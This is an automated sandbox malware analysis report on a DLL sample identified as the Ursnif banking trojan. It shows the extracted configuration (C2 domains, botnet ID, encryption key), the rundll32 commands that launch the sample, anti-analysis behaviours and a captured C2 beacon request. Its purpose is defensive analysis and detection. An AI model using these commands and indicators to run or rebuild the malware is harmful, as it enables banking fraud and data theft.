Play interactive tour

Edit tour

Analysis Report 609a460e94791.tiff.dll

Overview

General Information

Sample Name:	609a460e94791.tiff.dll
Analysis ID:	410818
MD5:	50a299d1e92d9205e123404c8e05904d
SHA1:	c188272ab757dbbf14e74781fc90fcefe4aeb615
SHA256:	3b56b7298c366a323d28658a455abf0d4e78fa197a43ce13bedab05f26901d34
Tags:	BRTdllgeogoziisfbitaursnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

IP address seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6660 cmdline: loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6672 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6700 cmdline: rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6688 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6736 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6760 cmdline: rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5436 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5924 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5436 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6660	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6700	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.4c894a0.3.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: 609a460e94791.tiff.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 609a460e94791.tiff.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\die\Oh\ease_Slip\Suffix\fall.pdb source: loaddll32.exe, 00000001.00000002.727825463.000000006E20B000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.730325292.000000006E20B000.00000002.00020000.sdmp, 609a460e94791.tiff.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,	1_2_6E1E5AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C94C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	4_2_02C94C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,	4_2_6E1E5AB0

Source: Joe Sandbox View

IP Address: 40.97.161.50 40.97.161.50

Source: global traffic

HTTP traffic detected: GET /login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBaicl7yvyNDs/NaAVAq9mPnbNTlKz1AUy2/5aIKWQiZNRBNaijS/Tt5Vo5dnaNIMeJI/Piqfb55cpfCEI8CpHK/_2FWICMIW/YUkQnOfGVld1SPd1rTnm/w0s_2F9NNcplFjkZ_2F/ufX9zF863VCJiOMFbmL1SV/K4t8NhPa8Lg/cl7PdmL.gfk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: ~DF6A2029352AAD8EB0.TMP.18.dr, {7A4756FC-B284-11EB-90E5-ECF4BB2D2496}.dat.18.dr

String found in binary or memory: https://outlook.office365.com/login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBa

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6660, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6700, type: MEMORY

Source: loaddll32.exe, 00000001.00000002.722729913.00000000016AB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6660, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6700, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E171F14 NtMapViewOfSection,	1_2_6E171F14
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1715F1 GetProcAddress,NtCreateSection,memset,	1_2_6E1715F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1723A5 NtQueryVirtualMemory,	1_2_6E1723A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C91168 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_02C91168
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C9B2F1 NtQueryVirtualMemory,	4_2_02C9B2F1

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E172184	1_2_6E172184
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C9B0CC	4_2_02C9B0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C9696A	4_2_02C9696A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C91B6A	4_2_02C91B6A

Source: 609a460e94791.tiff.dll

Binary or memory string: OriginalFilenamefall.dll8 vs 609a460e94791.tiff.dll

Source: 609a460e94791.tiff.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal64.troj.winDLL@14/5@3/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_02C97F56 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_02C97F56

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7A4756FA-B284-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF745550B0ECD73E02.TMP

Jump to behavior

Source: 609a460e94791.tiff.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5436 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5436 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 609a460e94791.tiff.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 609a460e94791.tiff.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 609a460e94791.tiff.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 609a460e94791.tiff.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1717FA LoadLibraryA,GetProcAddress,

1_2_6E1717FA

Source: 609a460e94791.tiff.dll

Static PE information: real checksum: 0xdacb0 should be: 0xd1c24

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E172120 push ecx; ret	1_2_6E172129
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E172173 push ecx; ret	1_2_6E172183
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E2406DB push ebp; retf 0000h	1_2_6E2406DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C9B0BB push ecx; ret	4_2_02C9B0CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C9AD00 push ecx; ret	4_2_02C9AD09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2406DB push ebp; retf 0000h	4_2_6E2406DC

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6660, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6700, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1A11D0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_6E1A11D0

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1E5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,	1_2_6E1E5AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02C94C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	4_2_02C94C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1E5AB0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,	4_2_6E1E5AB0

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1A36C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

